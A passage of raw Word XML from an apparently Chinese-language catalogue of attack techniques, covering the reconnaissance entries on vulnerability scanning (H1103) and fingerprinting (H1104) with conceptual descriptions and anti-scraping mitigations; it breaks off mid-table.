              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t>H1103</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59D35AFA" w14:textId="77777777" w:rsidR="00E261DC" w:rsidRDefault="00E261DC" w:rsidP="00E261DC">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：</w:t>
            </w:r>
            <w:r>
              <w:t>技术信息收集</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38E4C541" w14:textId="77777777" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B702F92" w14:textId="77777777" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59DDCF86" w14:textId="23CE239D" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中间件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FE66921" w14:textId="77777777" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662"/>
    <w:p w14:paraId="655BED74" w14:textId="3CBA4146" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描程序是一种应用程序，用于识别和创建连接到网络的所有系统（包括服务器，台式机，笔记本电脑，虚拟机，容器，防火墙，交换机和打印机）的清单。</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于它识别的每个设备，它还会尝试识别它运行的操作系统及其上安装的软件以及其他属性，如开放端口和用户帐户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5955DC24" w14:textId="4DEB2B11" w:rsidR="003F6C58" w:rsidRDefault="003F6C58" w:rsidP="003F6C58">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423E89C8" w14:textId="5EB8244F" w:rsidR="003F6C58" w:rsidRPr="00A0413E" w:rsidRDefault="003F6C58" w:rsidP="001A7662">
      <w:r w:rsidRPr="003F6C58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有什么可靠的方式来防止可读性扫描，唯一要做的就是确保你知道最新的漏洞情况并防止被利用。</w:t>
      </w:r>
      <w:r w:rsidRPr="003F6C58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F6C58">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果您只是更新服务器和软件，这样的机器人不太可能在您的系统中发现任何漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E13EC8" w14:textId="062363EE" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>指纹识别</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="001A7662" w14:paraId="22EC9535" w14:textId="77777777" w:rsidTr="001A7662">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="673233B4" w14:textId="3A59D590" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t>H1104</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C561000" w14:textId="77777777" w:rsidR="00E261DC" w:rsidRDefault="00E261DC" w:rsidP="00E261DC">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：</w:t>
            </w:r>
            <w:r>
              <w:t>技术信息收集</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BF67150" w14:textId="77777777" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0865B347" w14:textId="77777777" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="409B5A86" w14:textId="1226181C" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中间件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6924D384" w14:textId="77777777" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662"/>
    <w:p w14:paraId="44D350CF" w14:textId="1C8CD45F" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特定请求被发送到应用程序，以便对其进行概要分析。</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此探测通常检查</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标头名称和值，会话标识符名称和格式，错误页面消息的内容，</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路径区分大小写，</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路径模式，文件扩展名以及是否存在特定于软件的文件和目录。</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指纹识别通常依赖于信息泄漏，并且该分析还可以揭示一些网络架构</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拓扑。</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以在不直接使用本申请的情况下进行指纹识别，例如通过查询存储在搜索引擎索引中的已公开应用程序属性的存储。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0332CB" w14:textId="77777777" w:rsidR="006E7D91" w:rsidRDefault="006E7D91" w:rsidP="001A7662"/>
    <w:p w14:paraId="78AB7466" w14:textId="3AFC1B1E" w:rsidR="006E7D91" w:rsidRPr="0069302E" w:rsidRDefault="006E7D91" w:rsidP="00AE579F">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3539"/>
        <w:gridCol w:w="6197"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E7D91" w:rsidRPr="00567ECD" w14:paraId="0FE62452" w14:textId="77777777" w:rsidTr="006E7D91">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3A0257F7" w14:textId="77777777" w:rsidR="006E7D91" w:rsidRPr="00567ECD" w:rsidRDefault="006E7D91" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6197" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="06F569BD" w14:textId="77777777" w:rsidR="006E7D91" w:rsidRPr="00567ECD" w:rsidRDefault="006E7D91" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E7D91" w:rsidRPr="00A65911" w14:paraId="7D17E8D4" w14:textId="77777777" w:rsidTr="006E7D91">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B0C1B29" w14:textId="5052C525" w:rsidR="006E7D91" w:rsidRPr="00A65911" w:rsidRDefault="006E7D91" w:rsidP="006E7D91">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控日志和流量模式，如果发现异常活动，则限制访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A7A9E4D" w14:textId="61C748F0" w:rsidR="006E7D91" w:rsidRPr="00A65911" w:rsidRDefault="006E7D91" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>定期检查日志，如果有异常活动表明自动访问，例如来自同一</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地址的许多类似操作，您可以阻止或限制访问。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E7D91" w:rsidRPr="00A65911" w14:paraId="4928609C" w14:textId="77777777" w:rsidTr="006E7D91">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="194C0CB2" w14:textId="435F9001" w:rsidR="006E7D91" w:rsidRPr="006E7D91" w:rsidRDefault="006E7D91" w:rsidP="006E7D91">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注册和登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="158FCFEC" w14:textId="7F0379AB" w:rsidR="006E7D91" w:rsidRPr="0069302E" w:rsidRDefault="006E7D91" w:rsidP="006E7D91">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>则需要创建帐户才能获取网站信息，不仅对真实用户而且对</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>webscraper</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>有抑制作用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E7D91" w:rsidRPr="00A65911" w14:paraId="5BBD7D80" w14:textId="77777777" w:rsidTr="006E7D91">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D0F0C47" w14:textId="407B815B" w:rsidR="006E7D91" w:rsidRDefault="006E7D91" w:rsidP="006E7D91">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>阻止来自云托管和抓取服务</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地址的访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3556BDD6" w14:textId="2AEC2606" w:rsidR="006E7D91" w:rsidRPr="0069302E" w:rsidRDefault="006E7D91" w:rsidP="006E7D91">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>有时，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>webscraper</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将从</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>托管服务运行，例如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Amazon Web Services</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Google app Engine</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>VPS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制访问您的网站，以获取源自此类云托管服务所使用的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地址的请求。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>您还可以阻止从抓</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>取服务使用的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地址访问。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E7D91" w:rsidRPr="00A65911" w14:paraId="4CF0D051" w14:textId="77777777" w:rsidTr="006E7D91">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C48F76E" w14:textId="50AACAE9" w:rsidR="006E7D91" w:rsidRDefault="006E7D91" w:rsidP="006E7D91">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>注释您的错误信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5649167E" w14:textId="2213121E" w:rsidR="006E7D91" w:rsidRDefault="006E7D91" w:rsidP="006E7D91">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果您阻止访问，则应确保不告诉</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>webscrapers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>导致阻塞的原因，从而为他们提供有关如何处理爬取线索</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E7D91" w:rsidRPr="00A65911" w14:paraId="17464802" w14:textId="77777777" w:rsidTr="006E7D91">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="279D711B" w14:textId="7F415EAC" w:rsidR="006E7D91" w:rsidRPr="006E7D91" w:rsidRDefault="006E7D91" w:rsidP="006E7D91">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将文本内容作为图像</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E08EBAE" w14:textId="21743023" w:rsidR="006E7D91" w:rsidRDefault="006E7D91" w:rsidP="006E7D91">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>您可以将文本渲染到图像服务器端，并提供要显示的文本，这将阻碍简单的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>webscrapers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>提取文本。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E7D91" w:rsidRPr="00A65911" w14:paraId="3106B925" w14:textId="77777777" w:rsidTr="006E7D91">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F093938" w14:textId="179F5FB7" w:rsidR="006E7D91" w:rsidRPr="006E7D91" w:rsidRDefault="006E7D91" w:rsidP="006E7D91">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>阻止</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>解析器和</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>scraper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6197" w:type="dxa"/>
          </w:tcPr>
